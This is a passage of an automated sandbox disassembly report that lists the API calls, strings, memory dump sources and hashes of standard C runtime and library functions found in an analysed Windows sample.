Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C21963

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: b979aff6e2d81896d5250cc4ceecd8053c1a0cd9e6b2a6db10c938e4a46ea882
Instruction ID: 2b753b1faba9940fd9c0de1767a068145d4ae720c70ee88f89105d4949343795
Opcode Fuzzy Hash: b979aff6e2d81896d5250cc4ceecd8053c1a0cd9e6b2a6db10c938e4a46ea882
Instruction Fuzzy Hash: F5318126A0DA4681EB25AF56E4402BD7371FB44BE4F081633DA5DC73A6EE7CE462C340

Function 00007FF6D9C117CC Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C117E1
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C11806
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C11830
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C118A7
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C118C8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C118DB

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 721e6d6b9b749dfe3bea2467e9aeecfb1fb42092264e1b5ebf8258e60cb65a40
Instruction ID: 73d54b42b3335dd5f38c8aecec50382379f746a17f95532704c190bb901c3742
Opcode Fuzzy Hash: 721e6d6b9b749dfe3bea2467e9aeecfb1fb42092264e1b5ebf8258e60cb65a40
Instruction Fuzzy Hash: 9331AF22A09A4282FB159F56E8402BC6371EB45BE4F094233DE0D977E6DE3CE466C304

Function 00007FF6D9C2173C Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21751
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21776
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C217A0
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C21817
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21838
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C2184B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 7c14fbb30dc9cb119fca478a610244d5d74f2091f0ffb53f0a5167794b2ec2a0
Instruction ID: f59a721c2f7c28456b61f8bec8a8ca3f7cb69e76a9c1bc637fcec79adcfd9dfb
Opcode Fuzzy Hash: 7c14fbb30dc9cb119fca478a610244d5d74f2091f0ffb53f0a5167794b2ec2a0
Instruction Fuzzy Hash: 1E317426A09A4681EB25DF56E45017D7371EB94BE0F481533EE1DC76A6EE7CE462C300

Function 00007FF6D9C2B0DC Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6D9C2B27A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6D9C2B5A3

Strings

csm, xrefs: 00007FF6D9C2B1C1
csm, xrefs: 00007FF6D9C2B223
csm, xrefs: 00007FF6D9C2B2A1

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: d269b10b090600505750a3c819ac83394d3d02da0ad2d3e8d51ca689862eccdb
Instruction ID: 370ff1c0db88f1b0e4b1e458ebb9fee8cae01ce15882612e8508b5e36f83b7ba
Opcode Fuzzy Hash: d269b10b090600505750a3c819ac83394d3d02da0ad2d3e8d51ca689862eccdb
Instruction Fuzzy Hash: F1E19E72908B928AE720DF35D4802BD37B0FB45798F146236EA8D97796DF38E5A5C700

Function 00007FF6D9C3EA08 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6D9C3EA17
SetLastError.KERNEL32 ref: 00007FF6D9C3EA36
FlsSetValue.KERNEL32 ref: 00007FF6D9C3EA5F
FlsSetValue.KERNEL32 ref: 00007FF6D9C3EA70
FlsSetValue.KERNEL32 ref: 00007FF6D9C3EA81

Part of subcall function 00007FF6D9C3E5C0: HeapFree.KERNEL32(?,?,?,00007FF6D9C46936,?,?,?,00007FF6D9C46CB3,?,?,00000000,00007FF6D9C47239,?,?,?,00007FF6D9C4716B), ref: 00007FF6D9C3E5D6
Part of subcall function 00007FF6D9C3E5C0: GetLastError.KERNEL32(?,?,?,00007FF6D9C46936,?,?,?,00007FF6D9C46CB3,?,?,00000000,00007FF6D9C47239,?,?,?,00007FF6D9C4716B), ref: 00007FF6D9C3E5E0

SetLastError.KERNEL32 ref: 00007FF6D9C3EAA4

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 4b4b5bc632248bdb433cead8b46ecdca3223bae7e4b6a3fa7c4d12370feff017
Instruction ID: 71df9a4742499f1bf974ed701095d551e02f84ce4d9dc0b49799c7e91bb71ba0
Opcode Fuzzy Hash: 4b4b5bc632248bdb433cead8b46ecdca3223bae7e4b6a3fa7c4d12370feff017
Instruction Fuzzy Hash: 7C112B20B1824243FA547F31A85217E16726F88BE0F084637E95BC76D6DE2CF4619B40

Function 00007FF6D9C00120 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C00424
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C0042A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C00430

Strings

false, xrefs: 00007FF6D9C001FE
true, xrefs: 00007FF6D9C002BA

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: false$true
API String ID: 118556049-2658103896
Opcode ID: 972f107c7e3bfc2befb89246360020375a83d43149c605f2503a87af4f1b7fdc
Instruction ID: 544c90598c5ef3e1d2ba28a156ffbc35a41c21515dcb7a7bccc85d5546b5729f
Opcode Fuzzy Hash: 972f107c7e3bfc2befb89246360020375a83d43149c605f2503a87af4f1b7fdc
Instruction Fuzzy Hash: 48918D62B09B4686EB11DF62D4402AD33B5FB487D8F464236DE4CA7B99EF38D526C340

Function 00007FF6D9BFCF50 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFCF59
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF6D9BFCFA9
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFD0CB

Strings

bad locale name, xrefs: 00007FF6D9BFD12F

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2775327233-1405518554
Opcode ID: fd75101fff1ddf6bcefdbd753669c5238395d629f98c874148098408cef4706e
Instruction ID: cc21fa40355d74f04e119e0db57fd48845081a2463e12fec9fdbb95619a694bf
Opcode Fuzzy Hash: fd75101fff1ddf6bcefdbd753669c5238395d629f98c874148098408cef4706e
Instruction Fuzzy Hash: 48918926B0AB8989EB10DFA1D4506BD33B0EF99B88F054136EE4E93B59DF39D521C340

Function 00007FF6D9BFFF10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6D9BFFF5A
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFFF95
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF6D9BFFFDD
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C000E3

Strings

bad locale name, xrefs: 00007FF6D9C00109

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$AllocLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1970615557-1405518554
Opcode ID: 186519733328dc341932685420c5a8c6a9cbc219543865a61db791bdbc12f68c
Instruction ID: f1ef589c95fb0b85eca96ae1315cbb418030dafe0d382ad7c135ffc1cf25bc5a
Opcode Fuzzy Hash: 186519733328dc341932685420c5a8c6a9cbc219543865a61db791bdbc12f68c
Instruction Fuzzy Hash: E4515932B0AB4189FB20DFA1E4506ED32B4AF44788F994436EE9D97A85DE38D535C384

Function 00007FF6D9BF3700 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139encryptionCOMMONLIBRARYCODE

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,?,?,?,00007FF6D9BF101D), ref: 00007FF6D9BF373F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF375C
CertGetNameStringW.CRYPT32 ref: 00007FF6D9BF37AD
CertGetNameStringW.CRYPT32 ref: 00007FF6D9BF3844

Strings

0123456789abcdefghjkmnpqrstvwxyz, xrefs: 00007FF6D9BF3625

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: CertNameString$FreeLocal_invalid_parameter_noinfo_noreturn
String ID: 0123456789abcdefghjkmnpqrstvwxyz
API String ID: 1194004671-2680470996
Opcode ID: d047078aa7d2a75d1bade361f02e47fe51cdf74a91cb01b5719847fcd378c216
Instruction ID: 08eba2ff748207a99372090e9bef84b41af23cb530a7983e32ef598335a9b771
Opcode Fuzzy Hash: d047078aa7d2a75d1bade361f02e47fe51cdf74a91cb01b5719847fcd378c216
Instruction Fuzzy Hash: 3B41C176A09B8682EB148F25E44432E73A0FB85BD8F155232DB5D83BA4DF3DE4A1C740

Function 00007FF6D9BFFB60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6D9BFFBAB
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFFBE6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF6D9BFFC2E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFFD00

Strings

bad locale name, xrefs: 00007FF6D9BFFD27

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$AllocLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1970615557-1405518554
Opcode ID: 7866772bbb120e579c19f47f367152b472f64bbf34052f99c866df9876bd0871
Instruction ID: 68bacee3fe79b07cb2a656dedbb08ceb25b4b542dc141b6979e5e50b7ff2cde9
Opcode Fuzzy Hash: 7866772bbb120e579c19f47f367152b472f64bbf34052f99c866df9876bd0871
Instruction Fuzzy Hash: 58516736B0AB458AEB11DF60D4903AE37B4EF44B88F054936EE4D97A99DF38D520C354

Function 00007FF6D9BFFD40 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6D9BFFD8B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFFDC6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF6D9BFFE0E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFFECF

Strings

bad locale name, xrefs: 00007FF6D9BFFEF6

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$AllocLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1970615557-1405518554
Opcode ID: 81da17869bdb53e219f53fe6784221cd970ee4b54f1a9b69c806c506124e01f4
Instruction ID: b1593a0c5fde3801e0725d518eaa44184784c67e75a0b345f82138fd23a51dca
Opcode Fuzzy Hash: 81da17869bdb53e219f53fe6784221cd970ee4b54f1a9b69c806c506124e01f4
Instruction Fuzzy Hash: 26515A37B0AB458AEB55DF60D4803AE37B4EF58B88F054836EA4D93A86DF39D5308354

Function 00007FF6D9C00790 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32 ref: 00007FF6D9C0085B
LocalFree.KERNEL32 ref: 00007FF6D9C008D7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C00907
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C0090D

Strings

ios_base::failbit set, xrefs: 00007FF6D9C00A34

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLocal_invalid_parameter_noinfo_noreturn
String ID: ios_base::failbit set
API String ID: 195334829-3924258884
Opcode ID: bdc96ef9f32a7c71366f5c729cac4d9e279cf7ae0cb744149326c4ce65fc2f4b
Instruction ID: 7405f7b1e387a853a8f4e2dd31ae31c755af8d51f16c9b158169f613db98f821
Opcode Fuzzy Hash: bdc96ef9f32a7c71366f5c729cac4d9e279cf7ae0cb744149326c4ce65fc2f4b
Instruction Fuzzy Hash: 55419C62A09B8186EB14CF2AE84432DB770FB94BD4F555232EE8D43665DF7CE5A0C780

Function 00007FF6D9C1602C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 00007FF6D9C160D2
_Maklocstr.LIBCPMT ref: 00007FF6D9C160E8
_Getvals.LIBCPMT ref: 00007FF6D9C1618D

Strings

false, xrefs: 00007FF6D9C160CB
true, xrefs: 00007FF6D9C160E1

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Maklocstr$Getvals
String ID: false$true
API String ID: 3025811523-2658103896
Opcode ID: 7ace635c7ad6ec472de5639fea986f072d22dfd805493997a9e5bc8ab4cbee80
Instruction ID: 35ce400e4acbf74830cf9a5bf23d4c64d6e191ca8d2624986370e4422db7702a
Opcode Fuzzy Hash: 7ace635c7ad6ec472de5639fea986f072d22dfd805493997a9e5bc8ab4cbee80
Instruction Fuzzy Hash: E2418D27B08B819AF710DF75E4402ED33B0FB88788B445226EE4D67A59EF38D666C344

Function 00007FF6D9C3BCEC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6D9C3BD11
GetProcAddress.KERNEL32 ref: 00007FF6D9C3BD27
FreeLibrary.KERNEL32 ref: 00007FF6D9C3BD43

Strings

CorExitProcess, xrefs: 00007FF6D9C3BD20
mscoree.dll, xrefs: 00007FF6D9C3BD08

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a72d72f5e5df5979febe86a4c48affdf8c1640c0df6073a32ad95133436f51cf
Instruction ID: 70603f23fb644836b71d048b9d1d764ddadc8e9e676d580888b0d9452467028e
Opcode Fuzzy Hash: a72d72f5e5df5979febe86a4c48affdf8c1640c0df6073a32ad95133436f51cf
Instruction Fuzzy Hash: CEF06D21B0860281FA508F24A84137D5370AF897E1F540636D56E861E5CF3CE0A4CB10

Function 00007FF6D9C2A4DC Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FF6D9C2A5FF
__AdjustPointer.LIBCMT ref: 00007FF6D9C2A64A

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 4b46f25a73863d7cfdd4a5ce638acb544018d902231031f461183a5bc8e6ba65
Instruction ID: 4c9320e4d2fd094c0791891615ec5de794f1744e09d662af6bc36c0351706606
Opcode Fuzzy Hash: 4b46f25a73863d7cfdd4a5ce638acb544018d902231031f461183a5bc8e6ba65
Instruction Fuzzy Hash: 76B18E22A0AB82A2EA75DF15954027D73B1AF44BC4F09A837DA4D877D5EF3CE462C740

Function 00007FF6D9C00560 Relevance: 7.7, APIs: 5, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(?,?,?,00007FF6D9C0077B), ref: 00007FF6D9C00612
LocalAlloc.KERNEL32(?,?,?,00007FF6D9C0077B), ref: 00007FF6D9C00634
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D9BF6936,?,?), ref: 00007FF6D9C0069B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C006E6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C006EC

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Local$Alloc$Concurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1259271893-0
Opcode ID: 7314d4313823993fa5e2071c46be05ca7fd90f75f03cd2b4e5bea4768873b97c
